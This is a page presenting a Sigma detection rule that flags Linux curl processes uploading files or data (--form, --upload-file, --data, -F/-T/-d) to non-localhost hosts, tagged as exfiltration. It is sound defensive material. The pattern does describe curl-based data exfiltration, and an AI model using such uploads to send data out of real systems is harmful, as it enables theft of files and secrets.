Detectionmediumtest
Suspicious Curl File Upload - Linux
Detects a suspicious curl process start the adds a file to a web request
Convert In Phoenix Studio
Open this Sigma rule in the converter with the YAML preloaded and ready for backend selection.
Launch
Nasreddine Bencherchali (Nextron Systems), Cedric MAURUGEONCreated Thu Sep 15Updated Tue May 0200b90cc1-17ec-402c-96ad-3a8117d7a582linux
Log Source
LinuxProcess Creation
ProductLinux← raw: linux
CategoryProcess Creation← raw: process_creation
Events generated when a new process is spawned on the system. Covers command-line arguments, parent/child relationships, and process metadata.
Detection Logic
Detection Logic3 selectors
detection:
selection_img:
Image|endswith: '/curl'
selection_cli:
- CommandLine|contains:
- ' --form' # Also covers the "--form-string"
- ' --upload-file '
- ' --data '
- ' --data-' # For flags like: "--data-ascii", "--data-binary", "--data-raw", "--data-urlencode"
- CommandLine|re: '\s-[FTd]\s' # We use regex to ensure a case sensitive argument detection
filter_optional_localhost:
CommandLine|contains:
- '://localhost'
- '://127.0.0.1'
condition: all of selection_* and not 1 of filter_optional_*False Positives
Scripts created by developers and admins
MITRE ATT&CK
Rule Metadata
Rule ID
00b90cc1-17ec-402c-96ad-3a8117d7a582
Status
test
Level
medium
Type
Detection
Created
Thu Sep 15
Modified
Tue May 02
Path
rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml
Raw Tags
attack.exfiltrationattack.command-and-controlattack.t1567attack.t1105